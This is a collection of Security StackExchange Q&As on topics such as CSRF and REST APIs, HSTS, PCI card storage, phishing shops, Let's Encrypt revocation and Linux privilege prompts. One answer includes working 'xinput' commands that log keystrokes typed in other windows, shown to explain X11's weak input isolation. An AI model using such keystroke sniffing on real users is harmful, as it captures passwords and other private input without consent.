166,146
Say I have scanned our Cisco router, and it returned 20 vulnerabilities. However, most of them are tied to specific services that this router is not running; for example CVE-2016-6380: we are not running a DNS server on our Cisco, thus we are not vulnerable to it. On one hand, I should exclude this vulnerability from the report: we are not ACTUALLY vulnerable, and all this white noise quickly adds up until the report becomes useless, because nobody reads it. On the other hand, what if one day we decide to turn DNS or some other service on? We won't know we are vulnerable because it is no longer in scope. So I wonder whether you can point me in the right direction here. I'm currently skimming through NIST 800-115, but can't find the answer yet. Does NIST say anything about it at all? TLDR: Should a vulnerability in a service that is present on the device, but not running and not used at all, be mentioned in the vulnerability report?
It depends on how your organization uses these kinds of reports. If the people responsible for planning and/or implementing security controls read these documents once and then never look at them again, OR see them more as a guideline than actual rules on how to set up an environment, I can see that you might want to refrain from adding too much information to the report, just to make sure that the vulnerabilities that are actually present are met with safety measures. On the other hand, if these are "living" documents that set rules on how controls have to be planned and implemented, AND the people who are responsible update these documents if the infrastructure changes at a certain point, you definitely want to include these vulnerabilities. IMHO, as someone who organizes information security in an institution, this is the kind of culture you should push for. If you are afraid that your document will become too cluttered, you can always work with its structure. Something that was done in an organization I worked with was that vulnerabilities like this, or possible future vulnerabilities, were added in an annex to the main document. If the infrastructure was changed in any way, admins could check the annex first to see whether any of the changes would bring in the vulnerabilities listed there. One last point I would like to make: although YOU didn't enable those features, this doesn't mean an attacker won't do it after he/she has gained access to the router. So implementing security measures just in case can be reasonable. This might be something that should be evaluated in a risk analysis, though. To quote ISO/IEC 27005: "The presence of a vulnerability does not cause harm in itself, as there needs to be a threat present to exploit it. A vulnerability that has no corresponding threat may not require the implementation of a control, but should be recognized and monitored for changes."
{ "source": [ "https://security.stackexchange.com/questions/166146", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155377/" ] }
166,204
When we enter a URL in a browser, it uses HTTP by default, but if the server only supports HTTPS, does the traffic redirect to HTTPS automatically without the user noticing? Am I right? If wrong, please correct me.
No, at the moment no major browser would redirect to HTTPS automatically. The website can set the HSTS header to tell browsers that they should redirect to HTTPS automatically for future requests, or it can register itself in the HSTS preload list, and users can install browser plugins to always load HTTPS based on a whitelist or even to always try HTTPS first. All of these are opt-in: either the website or the user has to do something to make the browser do this. In its default configuration, without explicit action by the user or the web site, no major browser will automatically use HTTPS.
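For reference, HSTS is delivered as a single response header over HTTPS; a minimal example (the max-age value is just an illustration, and preload only has an effect once the domain has been submitted to the preload list):

```
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
```

Once a browser has seen this header, it will rewrite future http:// requests for the domain to https:// on its own for the duration of max-age.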
{ "source": [ "https://security.stackexchange.com/questions/166204", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155439/" ] }
166,226
I bought the mobile phone myself, but my employer paid for the mobile subscription. What data can they see, and what are the potential privacy risks? As far as I know they see which numbers I called (only traditional calls, not via VoIP apps), but they don't see individual Internet traffic. I also use the iPhone for the company's Microsoft Exchange server.
They will most likely be able to see an itemised bill showing who you called and when. They will also be able to see mobile data usage. If the phone is enrolled in the organisation's mobile device management system, they may be able to monitor and control app usage as well as monitor and control internet traffic. UPDATE: In a worst-case scenario they could potentially install full monitoring, including things like key loggers; this is very unlikely, however. Additionally, depending on what part of the world you live in, there are restrictions on what they can legally collect, especially without consent. The best thing to do is ask your company what you can and can't use the phone for. If it is a large organisation, they should have a security policy and an acceptable use policy.
{ "source": [ "https://security.stackexchange.com/questions/166226", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16066/" ] }
166,340
Finland's largest bank OP (formerly Osuuspankki) has added tracking domains (all three owned by Adobe) in their website redesign. These domains are loaded when signed in: 2o7.net, demdex.net and omtrdc.net. Is this considered acceptable? What information can third-party domains gather on my bank account activity?
It looks like the main site is embedding script from Adobe Marketing Cloud directly into the page. While these scripts are loaded from the same server as the main site, it looks like these scripts communicate with external servers using XHR and also download new script from demdex.net and 2o7.net, according to the logs of uBlock Origin. Especially the loading and executing of new scripts from a third party outside the control of your bank is a huge security problem. Essentially these scripts can get full control over the web site, including reading what you enter, changing submitted or displayed content, etc. This is essentially cross-site scripting, only that it did not happen by accident: the developers of the banking site explicitly invited these third parties to do cross-site scripting. While such use of third-party services might be acceptable on a site where no sensitive information is entered, it is absolutely not acceptable whenever sensitive information is transferred, or when unexpected changes to the content of a web site (like showing a different account balance) might cause unwanted actions from the visitor.
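As a sketch of the kind of control a site handling sensitive data could apply, a Content-Security-Policy response header can limit where scripts may be loaded from and which hosts the page may contact; the directives below are only an illustration, not the bank's actual configuration:

```
Content-Security-Policy: script-src 'self'; connect-src 'self'
```

With a policy like this, script running on the page could neither pull in additional code from demdex.net or 2o7.net nor send data to them via XHR, although the first-party script the site deliberately embeds would still run.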
{ "source": [ "https://security.stackexchange.com/questions/166340", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128225/" ] }
166,514
My husband got a pop-up ad on his phone for a fashion website and purchased two pairs of sunglasses using our debit card. The confirmation was emailed to me (marked as spam by gmail), and the site seemed very suspicious to me: the URL is nonsense, the confirmation message had a number of basic grammatical errors, and the deal seems too good to be true. It could potentially be completely legitimate, but I'm suspicious. What, if anything, should I do at this point to mitigate the fact that my husband just gave out our billing information to a potentially fraudulent website? We are in the USA. Billing confirmation message: [email protected] Jul 30 (2 days ago) to me Dear {{ [email protected] }}, Attention:This is a confirmation for your order detail. It means you have paid for the order successfully. Order details: Merchant Order No. : 628 Order No. : {{ order number }} Payment Date&Time : Mon Jul 31 03:01:01 CST 2017 Amount : 54.98 USD **Please do not reply to this email. Emails sent to this address will not be answered. **Due to floating exchange rate, tiny disparity of order value may exist. **Please note that your bank may apply a small charge for handling this transaction. Contact details: Email: [email protected] ☆ We an independent third party payment provider and as such protecting all cardholders is our primary concern. ☆If you have any problems about this transaction, please don’t hesitate to contact us. We’ll try our best to help you until you are satisfied with it. ☆Please ensure our email add added to your allowed list to ensure that we can help you properly.
The best course of action would be to contact your card provider and ask to block the transaction. Also, I recommend you block your credit card number and get a new replacement credit card. Here's why: The whois information for the website reveals that it is registered to someone in China with most likely a fake address: Domain Name: RBXZO.COM Registry Domain ID: 2137576384_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2017-06-27T10:21:01Z Creation Date: 2017-06-27T10:21:00Z Registrar Registration Expiration Date: 2018-06-27T10:21:00Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Not Available From Registry Registrant Name: liu fuquan Registrant Organization: liu fuquan Registrant Street: guangdongsheng zhaoqingshidinghuqu Registrant City: BeiJin Registrant State/Province: BeiJin Registrant Postal Code: 526000 Registrant Country: CN Registrant Phone: +86.017082434147 Registrant Phone Ext: Registrant Fax: +86.017082434147 Registrant Fax Ext: Registrant Email: The registered email at qq.com also looks fake. The website itself asks you to register an account and set a password on a non-SSL (not properly secured / no encryption) HTTP page. I did not actually go through with the registration page and cannot see the payment page, but I doubt that they have HTTPS (SSL) encryption on there either. Overall, very shady, and I highly recommend you block the transaction, block the credit card, and get a new credit card delivered to you. Addendum: As someone pointed out in comments, the password your husband created or used on the website should not be used elsewhere anymore. If your husband has that same password set elsewhere, we recommend changing it. Also, to clarify, you can try to cancel the transaction, but as others pointed out, you did initiate the transaction and so it's a valid transfer of money as far as your financial institution is concerned. So you will likely not recover the money your husband spent on the website. But you can block the card and ask for a new one to prevent misuse of your card in the future.
{ "source": [ "https://security.stackexchange.com/questions/166514", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99688/" ] }
166,684
The Let's Encrypt documentation recommends that when a certificate’s corresponding private key is no longer safe, you should revoke the certificate . But should you do the same if there are no indications that the key is compromised, but you no longer need the certificate? Let's Encrypt certificates will automatically expire after 90 days. Is it enough to delete the certificate and its private key? As a background, this is my concrete scenario: When we deploy new software, it will create new EC2 instances, which will eventually replace the existing instances (immutable server pattern). At startup, new instances will acquire a new Let's Encrypt certificate. Certificates (and their private keys) never leave the EC2 instance. So, when old instances are terminated, the certificates assigned to that machine will be destroyed. At this point, we are no longer able to get access to the private key. Questions: From my understanding, revoking might be a good practice. But strictly speaking, it will not increase the security of the system (of course, assuming that the private key was not compromised). Is that correct? Will it help the Let's Encrypt operators to explicitly revoke unused certificates, or will it do more harm? (I'm not sure, but revoking could trigger extra processes, which might be unnecessary if there is no indication of the key being compromised.)
This is a subjective cost vs. risk decision. We can't make it for you, but I can help you examine the factors involved. Cost: To you: the effort of revoking the cert. If you have to do this manually, that's annoying, but if you can script it up in 10 mins and add it to your CloudFormation plays, then why not? As @Hildred points out, this also advertises that your server has been decommissioned, which could be considered a privacy / security issue depending on how much you care. To LetsEncrypt: they need to handle the revocation request, which is not a particularly heavy request. Each revoked cert adds a line to their CRLs, slightly higher bandwidth costs to transmit the CRLs, and a slight performance penalty to their OCSP responders that need to search the CRLs. But it's certainly not a burden, since the system is literally designed for this. Risk: If an attacker finds out that you terminate your VMs without revoking the cert, can they use that to their advantage? A rogue admin (either yours or Amazon's) could pull the cert and key from the VM as it is being terminated and you'd be none the wiser. Is that likely, or any bigger of a threat than pulling it from a live system? Probably not. So really, we're dealing with a very small cost vs. a very small risk. Your choice. Thanks for asking the question though, neat to think about!
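If the certificates are issued with certbot, the "script it up" option is essentially a one-liner that can run as part of instance shutdown; a hedged sketch (the path shown is just the default certbot layout, adjust it to your setup, and the --reason value is optional):

```
certbot revoke --cert-path /etc/letsencrypt/live/example.com/cert.pem --reason cessationofoperation
```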
{ "source": [ "https://security.stackexchange.com/questions/166684", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18241/" ] }
166,724
Quick note: this is not a duplicate of CSRF protection with custom headers (and without validating token) despite some overlap. That post discusses how to perform CSRF protection on Rest endpoints without discussing if it is actually necessary. Indeed, many CSRF/Rest questions I've read on this site talk about securing the endpoints via CSRF tokens without actually discussing whether or not it is necessary. Hence this question. Is CSRF Protection necessary for Rest API endpoints? I've seen lots of discussion about securing REST endpoints against CSRF attacks, but having given the topic lots of thought, I'm very certain that CSRF tokens on a REST endpoint grant zero additional protection. As such, enabling CSRF protection on a REST endpoint just introduces some useless code to your application, and I think it should be skipped. I may be missing something though, hence this question. I think it will help to keep in mind why CSRF protection is necessary in the first place, and the attack vectors it protects against: Why CSRF? It really boils down to the browsers ability to automatically present login credentials for any request by sending along cookies. If a session id is stored in a cookie the browser will automatically send it along with all requests that go back to the original website. This means that an attacker doesn't actually have to know authentication details to take an action as the victim user. Rather, the attacker just has to trick the victims browser into making a request, and the credentials to authenticate the request will ride along for free. Enter a REST API Rest API endpoints have a very important difference from other requests: they are specifically stateless, and should never accept/use data from either a cookie or session. As a result, a REST API that sticks to the standard is automatically immune to such an attack. Even if a cookie was sent up by the browser, any credentials associated with the cookie would be completely ignored. Authentication of calls to a REST API are done in a completely different fashion. The most common solution is to have some sort of authentication key (an OAuth Token or the like) which is sent along in the header somewhere or possibly in the request body itself. Since authentication is application-specific, and since the browser itself doesn't know what the authentication token is, there is no way for a browser to automatically provide authentication credentials even if it is somehow tricked into visiting the API endpoint. As a result, a cookie-less REST endpoint is completely immune from CSRF attacks. Or am I missing something?
I wasn't originally aiming for a self-answer, but after more reading I've come up with what I believe to be a comprehensive answer that also explains why some might still be interested in CSRF protection on REST endpoints. No cookies = No CSRF It really is that simple. Browsers send cookies along with all requests. CSRF attacks depend upon this behavior. If you do not use cookies, and don't rely on cookies for authentication, then there is absolutely no room for CSRF attacks, and no reason to put in CSRF protection. If you have cookies, especially if you use them for authentication, then you need CSRF protection. If all you want to know is "Do I need CSRF protection for my API endpoint?" you can stop right here and leave with your answer. Otherwise, the devil is in the details. h/t to paj28: While cookies are the primary attack vector for CSRF attacks, you are also vulnerable if you use HTTP/Basic authentication. More generally, if the browser is able automatically pass along login credentials for your app, then CSRF matters. In my experience cookies are the most common technology being exploited to make CSRF happen, but there are some other authentication methods that are used which can result in the same vulnerability. REST = Stateless If you ask someone "what is REST" you will get variety of answers that discuss a variety of different properties. You can see as much because someone asked that question on stack overflow: https://stackoverflow.com/questions/671118/what-exactly-is-restful-programming One property of REST that I have always relied upon is that it is stateless. The application itself has state of course. If you can't store data in a database somewhere, your application is going to be pretty limited. In this case though, stateless has a very specific and important meaning: REST applications don't track state for the client-side application. If you are using sessions, then you are (almost certainly) keeping track of client-side state, and you are not a REST-full application. So an application that uses sessions (especially for logins) that are tracked via cookies is not a REST-full application (IMO), and is certainly vulnerable to CSRF attacks, even if it otherwise looks like a REST application. I think it is worth a quick note that one reason that client-side statelessness is important for REST applications is that the ability of intermediaries to cache responses is also a desirable part of the REST paradigm. As long as the application is tracking client-side state, caching is not possible. Rest ≠ Cookieless For these reasons, I initially assumed that a fully-compliant REST application would never need sessions, never need cookies, and therefore never need CSRF security. However, there is at least one use-case that may prefer cookies anyway: persistent logins. Consider a typical client-side (in this case browser, not mobile) web application. You get started by logging in, which uses a REST API to validate user credentials and in return is given a token to authorize future requests. For single page applications, you can just keep that token in memory, but doing so will effectively log the user out if they close the page. As a result, it would be good to persist the state somewhere that can last longer than a single browser session. Local storage is an option, but is also vulnerable to XSS attacks: a successful XSS attack can result in the attacker grabbing your login tokens and sending them off to the attacker to be used at their discretion. 
For this reason, I have seen some suggest using cookies to store login tokens. With a cookie you can set the http-only flag, which prevents the application from reading the cookie after it is set. As a result, in the event of an XSS attack, the attacker can still make calls on your behalf, but they can't walk away with the authorization token all together. This use of cookies doesn't directly violate the statelessness requirement of REST because the server still isn't tracking client-side state. It is just looking for authentication credentials in a cookie, rather than the header. I mention this because it is potentially a legitimate reason to use cookies with a REST API, although it is obviously up to a given application to balance the various security and usability concerns. I would personally try to avoid using cookies with REST APIs, but there may very well be reasons to use them anyway. Either way, the overall answer is simple: if you are using cookies (or other authentication methods that the browser can do automatically) then you need CSRF protection. If you aren't using cookies then you don't.
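As an illustration of the cookie-based token storage described above, here is a minimal sketch using Flask (chosen only for illustration; the route and cookie names are made up). Note that the moment you do this, the browser starts attaching the token automatically, so CSRF protection is back on the table:

```python
import secrets

from flask import Flask, make_response

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    # In a real app the token would be issued after verifying credentials;
    # a random value stands in for it here.
    token = secrets.token_urlsafe(32)
    resp = make_response("ok")
    # HttpOnly stops scripts (and thus XSS payloads) from reading the cookie,
    # Secure restricts it to HTTPS, and SameSite limits cross-site sending.
    resp.set_cookie("auth_token", token, httponly=True, secure=True, samesite="Strict")
    return resp
```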
{ "source": [ "https://security.stackexchange.com/questions/166724", "https://security.stackexchange.com", "https://security.stackexchange.com/users/149676/" ] }
167,106
As the title says, I was asked for my online banking password while in the process of getting in touch with a real person. This is something I'd never do, and knowing that the call was being recorded (for further improvement of the bot I was talking to) makes it even worse. After that, I hung up, and I'm pretty sure it is a violation of privacy, as you are asked for private details and the call is not encrypted whatsoever. Has anyone been asked for this before? Is this a normal practice? After saying my ID number, the bot referred to me as "Mr. my_last_name", so I guess it is a legit phone number, but could they have been hacked and the support number hijacked? Should I take any actions?
Assuming that you called them on a published number, I'd say that this sounds like it was an Interactive Voice Response (IVR) system, which is pretty common in the banking world. The concept is that the system takes your authentication information before passing you on to a contact centre agent. The benefit of this from a security perspective is that the agent in the call centre then doesn't have to ask you to authenticate yourself before discussing your account. If correctly implemented, this should be no more insecure than typing your password into a website. There is an automated system processing the voice data and it should store/log this appropriately. Of course, as you point out, there is the risk of phone tapping, but then if you assume that your phone line is tapped, any form of phone banking is insecure, as they've got to authenticate you somehow to be able to discuss your account with you. EDIT: To add some more details, rather than leave them scattered around comments that could get cleared. Basically, banks have to authenticate you somehow, no matter which channel (e.g. web, phone, branch) you use to contact them, and there are trade-offs to be considered. On the one hand, having dedicated credentials per channel is useful in that it reduces the risk of compromise, and avoids muddying the message of "don't tell people your web password", but it leaves users with more credentials to manage and in all likelihood a lot of password resets if users only use a specific channel rarely (with all the vulnerabilities that frequent resets attract). So the option that appears, from the information provided, to be used here is to combine the credentials for the web and phone channels, and to use an automated IVR system on the phone channel to avoid credentials being given to contact centre agents. The upside here is a single set of creds, so users won't forget them, and the downside is the scenario we see, where the bank messaging "don't give people your password" leads to problems in using this system. In terms of the IVR system security, this is essentially like any other system that processes data. It needs to be secured appropriately so that user credentials are not exposed, no different than the web channel. Obviously a system like hardware (not SMS) 2FA could work well in this scenario, as numeric codes are easily passed to IVR systems, but that has its own tradeoffs in terms of cost and user experience.
{ "source": [ "https://security.stackexchange.com/questions/167106", "https://security.stackexchange.com", "https://security.stackexchange.com/users/108682/" ] }
167,284
Why is the following database table not secure? Which encryption method is better for credit cards?

+--------------+-------------------------------+-----------+--------------+
| customer_id  | card_number                   | card_cvv  | card_expiry  |
+--------------+-------------------------------+-----------+--------------+
| 2315         | ODU2OS0xMjU0LTc4NTQtMzI2NQ==  | MjU4OQ==  | May 2018     |
+--------------+-------------------------------+-----------+--------------+
It's obviously base64 encoded. If someone steals your database, he can just decode the data and have the credit card of every customer. You could just store it as a plain string and have basically the same security, as you are only using more bytes to achieve the same result. To store credit card data, you must be compliant with PCI rules. And PCI explicitly forbids storing the CVV. If your table has a field for CVV, you failed. If you encode it and store it, you failed. Even if you encrypt it, you failed. The CVV must never be stored by any means. As for the encryption method, first read the PCI documentation. Building secure credit card storage is a very difficult task and a very serious one, so don't attempt to do it without understanding the correct methods, risks and mitigations, or you will expose your clients to financial losses and yourself to litigation.
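To make the first point concrete, here is a quick Python check of the values shown in the question; anyone with a copy of the table can do the same:

```python
import base64

print(base64.b64decode("ODU2OS0xMjU0LTc4NTQtMzI2NQ==").decode())  # 8569-1254-7854-3265
print(base64.b64decode("MjU4OQ==").decode())                      # 2589
```

Encoding is not encryption: there is no key involved, so there is nothing protecting the data.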
{ "source": [ "https://security.stackexchange.com/questions/167284", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156569/" ] }
167,412
Sometimes, Ubuntu shows a window asking for my password. This window can be caused by some background processes running, such as an automatic update, or a process which reports bugs to Canonical that manifests itself the same way. Since those are background processes, the window is not shown in response to an action I performed myself, in a situation where I was expecting the system to ask me for the password. This means that: (1) from the perspective of the user, there is no guarantee that the prompt comes from the operating system; it could be any malicious program which has only a limited permission to show a window, and which, by prompting for my password, would gain unlimited access to the entire machine; and (2) by prompting the user for a password regularly, the system teaches the user that giving his system password whenever some application asks for it is a perfectly natural thing to do. My questions are: Is there any safety mechanism in Linux in general, or Ubuntu specifically, that prevents any application from displaying a dialog which looks identical to the system one, asking me for my password? How should such windows be designed to increase the safety of the user? Why not implement a system similar to Windows' Ctrl + Alt + Del on logon?
Your points are all good, and you are correct, but before we get outraged about it we need to remind ourselves how the Linux security model works and what it's designed to protect. Remember that the Linux security model is designed with a multi-user terminal-only or SSH server in mind. Windows is designed with an end-user workstation in mind (but I've heard that the recent generation of Windows is more terminal-friendly). In particular, Linux convention does a better job of sandboxing apps into users, whereas in Windows anything important runs as System; meanwhile the Linux GUI (X Server) sucks at security, and the Windows GUI has fancy things like UAC built in. Basically, Linux is (and always has been) a server first and a workstation second, while Windows is the other way around. Security Models: As far as "the OS" (i.e. the kernel) is concerned, you have 7 tty consoles and any number of SSH connections (aka "login sessions") - it just so happens that Ubuntu ships with scripts to auto-start the GUI on the tty7 session, but to the kernel it's just another application. Login sessions and user accounts are sandboxed quite nicely from each other, but Linux takes a security mindset that you don't need to protect a user from them-self. In this security model, if your account gets compromised by malware then it's a lost cause, but we still want to isolate it from other accounts to protect the system as a whole. For example, Linux apps tend to create a low-privilege user like apache or ftp that they run as when not needing to do rooty things. If an attacker manages to take control of a running apache process, it can muck up other apache processes, but will have trouble jumping to ftp processes. Note that Windows takes a fundamentally different approach here, largely through the convention that all important things run as System all the time. A malicious service in Linux has less scope to do bad things than a malicious process running as System, so Windows needs to go to extra efforts to protect someone with admin rights from "them-self". GUI environments and an X Server that was not designed for security throw a wrench into this security model. Gnome gksudo vs Windows UAC, and keyloggers: In Windows, when a user process requests privilege escalation, the kernel throws up a special protected prompt whose memory and keyboard / mouse bus are isolated from the rest of the desktop environment. It can do this because the GUI is built into the OS. In Linux, the GUI (X server) is just another application, and therefore the password prompts belong to the process that invoked them, running as you, sharing memory permissions and an input bus with every other window and process running as you. The root prompt can't do the fancy UAC things like lock the keyboard, because those either need to be root already, or require totally re-designing the X server (see Wayland below). A catch-22 that in this case is a downside of separating the GUI from the kernel. But at least it's in keeping with the Linux security model. If we were to revise the security model to clamp down on this by adding sandboxing between password prompts and other processes running as the user in the same GUI session, we would have to re-write a great many things. At the least, the kernel would need to become GUI-aware such that it is capable of creating prompts (not true today). The other go-to example is that all processes in a GUI session share a keyboard bus.
Watch me write a keylogger and then press some keys in a different window : ➜ ~ xinput list ⎡ Virtual core pointer id=2 [master pointer (3)] ⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)] ⎜ ↳ Logitech K400 Plus id=9 [slave pointer (2)] ⎜ ↳ ETPS/2 Elantech Touchpad id=13 [slave pointer (2)] ➜ ~ xinput test 9 key release 36 key press 44 hkey release 44 key press 40 ekey release 40 key press 33 lkey release 33 key press 33 lkey press 39 okey release 33 key release 39 key press 66 key press 31 Any process running as you can sniff the password in another process's prompt or terminal and then call sudo on itself (this follows directly from the "no need to protect you from you" mindset), so increasing the security of the password prompts is useless unless we fundamentally change the security model and do a massive re-write of all sorts of things. (it's worth noting that Gnome appears to at least sandbox the keyboard bus on the lock screen and new sessions through "Switch Users" as things typed there do not show up in my session's keyboard bus) Wayland Wayland is a new protocol that aims to replace X11. It locks down client applications so that they cannot steal information or affect anything outside of their window. The only way the clients can communicate with each other outside of exterior IPC is by going through the compositor which controls all of them. This doesn't fix the underlying problem however, and simply shifts the need for trust to the compositor. Virtualization and Containers If you work with cloud technologies, you're probably jumping up and down saying "Docker is the answer!!". Indeed, brownie points for you. While Docker itself is not really intended to enhance security (thanks @SvenSlootweg), it does point to using containerization and / or virtualization as a forward that's compatible with the current Linux architecture. Two notable linux distributions that are built with inter-process isolation in mind: Qubes OS that runs user-level apps inside multiple VMs separated into "security domains" such as work, banking, web browsing. Android that installs and runs each app as a separate low-privilege user, thus gaining process-level isolation and file-system isolation (each app is confined to its own home directory) between apps. Bottom Line: From the perspective of an end-user, it's not unreasonable to expect Linux to behave the same way as Windows, but this is one of those cases where you need to understand a bit about how the underlying system works and why it was designed that way. Simply changing the implementation of the password prompts will not accomplish anything so long as it is owned by a process owned by you. For Linux to get the same security behaviours as Windows in the context of a single-user GUI workstation would require significant re-design of the OS, so it's unlikely to happen, but things like Docker may provide a way forward in a more Linux-native way. In this case, the important difference is that Linux is designed at the low level to be a multi-user server and they make the decision not to protect a user from them-self, while Windows is designed to be a single-user workstation, so you do need to have inter-process protections within a login session. It's also relevant that in Windows the GUI is part of the OS, while in Linux the GUI is just another user-level application.
{ "source": [ "https://security.stackexchange.com/questions/167412", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7684/" ] }
167,422
While downloading a file via a torrent, what will happen if some of the peers send me fake chunks? Also, can any of the peers send me a whole fake file? For example, if I download a .torrent file which should download a file with hash sum A, and a peer sends me a file with hash sum B, will the torrent client notice that and block it?
Yes, a client will notice and block. A torrent is divided into pieces, and each piece is divided into chunks. Every piece has its SHA1 hash included in the .torrent's metadata. If a peer sends fake or corrupted chunks, this will be detected when the whole piece has been received and the hash check fails. A peer that repeatedly sends bad data will be blocked, but there is some leeway, because corruption may naturally occur sometimes in a data transfer. A good client has heuristics to find out exactly which peer(s) sent bad data by comparing the chunks sent in the piece that failed the hash check with the chunks in the same piece once it has been re-downloaded and passed the hash check.
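A rough sketch of the per-piece check a client performs, assuming you already have the piece data and the corresponding 20-byte SHA1 digest from the .torrent's info dictionary (the function and variable names are mine, not from any particular client):

```python
import hashlib

def piece_is_valid(piece_data: bytes, expected_sha1: bytes) -> bool:
    # The .torrent metadata stores one 20-byte SHA1 digest per piece;
    # the piece is only accepted once its digest matches.
    return hashlib.sha1(piece_data).digest() == expected_sha1
```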
{ "source": [ "https://security.stackexchange.com/questions/167422", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
167,744
I had an idea to make a plugin for one of my email clients where my users will be able to upload & scan attachments using the VirusTotal service, but then again I was worried about their privacy and the security of uploading personal files, which might end up exposed to someone. My question here is: how safe is it to upload personal files? Could they get exposed to someone besides the owner of VirusTotal?
Paid subscribers to VirusTotal can download files uploaded by others. Whether you consider this still safe for your users depends on what you consider safe. See also their Privacy Policy, which clearly says: "Information we share: When you submit a file to VirusTotal for scanning, we may store it and share it with the anti-malware and security industry ... Files, URLs, comments and any other content submitted to or shared within VirusTotal may also be included in premium private services offered by VirusTotal to the anti malware and ICT security industry." Still, I think that your idea of offering simpler access to a useful service directly from the mail client makes sense. I would, though, recommend that you add an easy to understand but not easy to ignore warning about the privacy implications before the user uploads a file. And it might be less invasive to first check if the hash already exists at VT before uploading a file (and not upload if the hash is known to VT). Ideally you also make it easy for users to remove an accidentally shared file (thanks to @Mirsad for this suggestion in a comment).
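A sketch of the "check the hash first" idea against the VirusTotal v3 REST API; treat the endpoint and header name as assumptions to verify against the current API documentation, and the API key is a placeholder:

```python
import hashlib

import requests

API_KEY = "your-api-key"  # placeholder

def already_known_to_virustotal(path: str) -> bool:
    # Hash the attachment locally and look the hash up instead of uploading the file.
    with open(path, "rb") as f:
        sha256 = hashlib.sha256(f.read()).hexdigest()
    r = requests.get(
        f"https://www.virustotal.com/api/v3/files/{sha256}",
        headers={"x-apikey": API_KEY},
    )
    return r.status_code == 200  # a 404 means VirusTotal has never seen this file
```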
{ "source": [ "https://security.stackexchange.com/questions/167744", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46520/" ] }
167,883
I'm still learning how SSL/TLS works, so apologies if this question is very basic. I understand that the server offers the client its SSL certificate, which contains the signature of a CA. I also understand that the client will usually have a list of certificate authorities it trusts. But what if the SSL certificate is signed by a CA that the client is not aware of? How will the client validate the certificate then?
When the client is verifying a certificate, there are three possibilities: (1) The certificate is signed by a CA that the client already trusts (and for which it knows the public key). In this case the client treats the certificate as valid. (2) The certificate is signed by a CA about which the client has no knowledge at all. In this case the client treats the certificate as invalid (and the browser will likely display a warning message instead of loading the page). (3) The certificate is signed by a CA that the client doesn't know, but which has a certificate that is signed by a CA that the client does know. (In this case the server must usually send both its own certificate and the certificate of the CA - called the "intermediate CA" - that signed its certificate.) Since the intermediate CA's certificate is signed by a CA that the client already trusts, it knows it can trust it, and since the server's certificate is signed by the intermediate CA, the client knows it can trust it too. Note that CA certificates are "special": just because you have a certificate signed by a trusted CA, that doesn't mean you can then sign other certificates and have clients trust them - unless your certificate is marked as being valid for signing other certificates.
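A small illustration of the "already trusts" part, using Python's ssl module as a stand-in for a browser: the default context loads the platform's trusted root CAs, and the handshake only succeeds if the chain the server presents (including any intermediates it sends) leads back to one of them. The hostname is a placeholder:

```python
import socket
import ssl

ctx = ssl.create_default_context()  # loads the platform's trusted root CAs

with socket.create_connection(("example.com", 443)) as sock:
    # The handshake raises ssl.SSLCertVerificationError if the presented chain
    # does not end at a trusted root or the hostname does not match.
    with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.getpeercert()["issuer"])
```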
{ "source": [ "https://security.stackexchange.com/questions/167883", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157252/" ] }
167,893
As above, we were planning to do the following: (1) access our HSM (Luna SA), (2) generate a CSR, (3) send the CSR to a 3rd party CA, (4) add the critical key usage of Non-Repudiation on the 3rd party's portal, and (5) send the now signed CSR (public key), which has the key usage, to our trading partner. Does it matter if I have not added the key usage attribute during the CSR generation on the HSM, as I cannot find a way to add the key usage with the HSM client software? Regards
{ "source": [ "https://security.stackexchange.com/questions/167893", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157258/" ] }
167,955
I don't know how to ask this because this is something new for me. I tried to telnet to my server and the output was like this: Trying <IP>... Connected to www.tjto6u0e.site. Escape character is '^]'. Then I tried netstat -a | grep www.tjto6u0e.site. I am using Ubuntu and it was compromised before, but I have scanned my server and deleted all infected files, including changing my default ssh port (22) to another one. But this one I don't understand: is this normal, or something that I should worry about? I checked this IP 43.252.11.213 from netstat -an and it redirected to a URL, bulan.loket.co.id. I don't have any idea what is happening; does it mean that my site is copied to another domain?
"Is this normal [that my server login reports a different domain]?" Of course not. "I am using Ubuntu and it was compromised before." Well ... you shouldn't have continued using it. "But I have scanned my server and deleted all infected files." Virus scanners on an already compromised machine are pretty useless. (Even more useless than at other times.) "Including changing my default SSH port (22) to another one." Does this matter? Does this matter if you're using telnet? And why are you using telnet?! "I checked this IP 43.252.11.213 ... and it redirected ..." You also should never have called this in a browser. "Does it mean that my site is copied to another domain?" No. Well, maybe, but that's not the problem. Until proven otherwise, assume that someone else has full control over your server (including all content, but also all other things the computer can do). What you should do now: Try to find out how your server got compromised and fix that (the probability is low that you will find the reason). Also change all passwords, get used to regular software updates, SSH keys, fail2ban and so on. Wipe your server clean and start again by installing an OS, all necessary software, and all configs you need/want.
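On the "SSH keys" point, once the rebuilt server has your public key installed, the usual hardening amounts to a couple of lines in /etc/ssh/sshd_config (a minimal sketch, to be adapted to your setup), followed by restarting the SSH service:

```
PasswordAuthentication no
PermitRootLogin no
```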
{ "source": [ "https://security.stackexchange.com/questions/167955", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157247/" ] }
168,055
Is it safe to split a private key file and put it in different locations? I mean can somebody actually do anything with only a part of a key?
